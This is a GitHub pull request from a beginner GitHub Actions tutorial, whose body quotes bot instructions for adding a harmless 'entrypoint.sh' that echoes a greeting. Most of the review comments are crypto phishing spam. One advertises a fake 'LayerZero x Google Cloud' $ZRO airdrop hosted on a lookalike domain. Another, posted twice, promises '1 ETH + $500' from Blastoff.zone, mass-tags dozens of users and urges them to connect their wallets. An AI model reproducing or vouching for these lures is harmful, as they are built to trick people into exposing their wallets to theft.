### PR TITLE
Create Dockerfile

### LINKED ISSUE #3: Dockerfile
Nice work, you committed a `Dockerfile`. You'll notice at the end of the Dockerfile, we refer to an entrypoint script.

```Dockerfile
ENTRYPOINT ["/entrypoint.sh"]
```

The `entrypoint.sh` script will be run in Docker, and it will define what the action is really going to be doing.

## Step 2: Add an entrypoint script

An entrypoint script must exist in our repository so that Docker has something to execute.

### :keyboard: Activity: Add an entrypoint script and commit it to your branch

1. As a part of this branch and pull request, create a file in the `/action-a/` directory titled `entrypoint.sh`. You can do so with [this quicklink](https://github.com/NateBoogie24/hello-github-actions/new/NateBoogie24-patch-1?filename=action-a/entrypoint.sh)
1. Add the following content to the `entrypoint.sh` file:

   ```shell
   #!/bin/sh -l

   sh -c "echo Hello world my name is $INPUT_MY_NAME"
   ```

1. Stage and commit the changes
1. Push the changes to GitHub

<hr>
<h3 align="center">I'll respond when I detect a new commit on this branch.</h3>

_Originally posted by @github-learning-lab[bot] in https://github.com/NateBoogie24/hello-github-actions/issues/2#issuecomment-946790512_ENTRYPOINT ["/entrypoint.sh"]

### PR DESCRIPTION
**Pull request by NateBoogie24**

### CODE REVIEW

**Comment by cheransengodan-sensiple** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

Claim Now

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!

**Comment by cmurav** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
ReeRiley, @warexify, @ttogola, @markvital, @Ozone2037, @Dloogi, @malek227, @ShortyV21, @Royaltjuan86, @Mehdish1, @RSivakov, @anfpara-source, @shahngah, @DSAvage111111, @bitruss, @kingjollie, @ravidsrk, @MissLov3ly, @bayram63, @harshjv, @Isis831, @MrGreem, @q1blue, @aXoto, @BIGChask, @cowley86-cmd, @RickCastle2018, @Kamon1102, @misoobu, @, @16abhimasani, @Mepond, @jaysonmald35, @udakwan, @appfromape, @samisbakedham, @hisamo0601, @CECE85, @Cedwards28, @Cashmann661209, @yellowstone2999, @NetOpWibby, @SKYLARMIC25, @S1nDromm, @Kinchi72, @seiko520, @yogiartnft, @elmaedesistemas, @Originalmenace, @Katledge

**Comment by cmurav** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!

**Comment by Originalmenace** [comment]
Sorry I haven't replied . I really don't know much about code I won't lie

**Review by ZoneXGamer — APPROVED** [review]

**Pull request closed without merging**
